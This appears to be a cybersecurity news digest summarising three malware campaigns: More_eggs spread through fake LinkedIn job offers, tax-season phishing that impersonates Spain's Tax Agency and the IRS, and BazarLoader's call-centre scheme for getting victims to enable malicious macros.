Malware distribution campaign via LinkedIn
The eSentire research team has published details on the analysis of a new malware distribution campaign via LinkedIn. Threat actors are sending zipped files under the pretext of job offers, naming the file after the alleged job position to gain the victim’s trust. Once the attachment is opened, the installation of More_eggs malware, which is characterised by using legitimate Windows processes to circumvent security solutions, starts stealthily. This malware would function as a dropper, since once the user’s device is infected, access to the system is generated in order to proceed with the download of other malware or to exfiltrate information. It is worth noting that this tool is sold as Malware as a Service (MaaS) by the Golden Chickens organisation, which, according to researchers, has links to other advanced actors such as FIN6, Cobalt Group and Evilnum.
Tax season impersonation campaigns
Several global fraudulent email campaigns have been detected which are using the tax filing season as a lure. The aim of the threat actors behind these operations would be both the distribution of malware, via attachments in the messages, and the collection of data via phishing pages. A warning issued by INCIBE points to an ongoing campaign targeting employees and/or the self-employed in Spain, in which the Tax Agency is being impersonated. Likewise, the US Internal Revenue Service (IRS) is reportedly suffering from identity theft in phishing emails targeting students and teaching staff, as well as the distribution of malware from download links or attachments.
BazarLoader uses underground call centres for distribution
Researchers at Recorded Future warn of a new campaign by the operators of the BazarLoader malware, active since January 2021, in which underground call centres are being used to trick victims into downloading and opening the malicious documents that will infect them. Although this is not the first time this methodology has been observed, it is the first time that call centres have been used by large-scale malware such as Bazarloader, in an operation that has been called BazarCall or BazaCall. These campaigns start by sending spam emails to targeted victims; the emails sent usually pretend to be offers, free trials or subscriptions to medical, IT or other financial services. In these emails, they are told that they can call a phone number to get more information about the offer, and if they call, they get English-speaking operators who guide them to download the attachment, disable Office security features and allow the document (usually an Excel or Word document) to enable macros, through which the malware is downloaded and infects the system. Security analysts have observed such campaigns also deploying the Ryuk ransomware or the Trickbot trojan.